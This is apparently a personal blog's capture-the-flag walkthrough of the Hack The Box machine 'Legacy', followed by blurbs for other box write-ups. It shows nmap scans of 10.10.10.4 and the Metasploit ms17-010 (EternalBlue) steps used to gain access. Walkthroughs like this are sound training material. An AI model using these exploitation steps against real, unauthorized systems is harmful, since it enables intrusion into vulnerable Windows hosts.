tsustyle

Red Team Aspirant

Legacy

less than 1 minute read

img

Port Scanning and General Enumeration (Nmap)

My initial all ports scan showed 139, 445 and 3389 open. So I targeted those in my targets scan.

nmap -p 139,445,3389 -oN targeted -Pn -T4 -A 10.10.10.4

img

Also ran a script scan using the --script=vuln switch

nmap -Pn 10.10.10.4. -p 139,445 --script=vuln

img

Interesting…

Access (Metasploit, ms17-010)

Let’s follow up on ms17-010 lead from nmap using metasploit.

msfconsole search ms17-010

img

Set your options:

set rhosts 10.10.10.4 set lhost tun0

Fire!

img

That was easy. Capture the flags.

img

img

You may also enjoy

Tenet

‘Tenet’ is a medium rated box on Hack the Box. We’ll be using PHP Object Injection to get RCE and identify a race condition in a custom script for privesc.

Skynet

‘Skynet’ is a box on TryHackMe. We’ll be enumerating SMB shares, brute forcing a login and exploiting a Remote File Inclusion vulnerability in Cuppa CMS for a foothold. For our root shell we’ll take a look at exploiting some wildcard injection using a script that’s being run as a cronjob.

FFuF Cheatsheet

This is a Cheatsheet I created for reference when using FFuF

Ready

‘Ready’ is a medium rated box on Hack the Box. We’ll be using a public exploit for a vulnerable Gitlab version for a shell, enumeration and password reuse for privesc and escape a docker container for root